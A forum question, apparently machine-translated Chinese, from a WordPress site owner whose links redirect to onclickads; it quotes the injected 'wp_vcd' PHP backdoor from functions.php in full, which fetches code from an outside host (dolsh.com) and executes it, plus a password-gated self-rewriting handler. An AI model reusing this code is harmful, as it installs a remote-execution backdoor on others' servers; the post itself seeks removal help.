我不知道这是否是每次当我点击我网站上的一些链接时onlickads 代码它重定向我onclickads.com链接。WordPress网站已将我的链接重定向到onclickads网站
每次我删除我的主题这段代码的functions.php它会一次又一次地产生这种代码..当我检查的主题函数不包含这些代码的原始文件。
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if (! function_exists('w1p_te1mp_se1tup')) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if (! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
任何一个可以建议做什么或TUTS删除我的网站上的恶意软件,
谢谢。
如果它的每一次再次发生,我建议你做一个干净的安装你的WordPress让黑客从你的安装目录 – Ferrybig
感谢您的建议,也许生病的做到这一点,我别无选择。 :( – GravityCode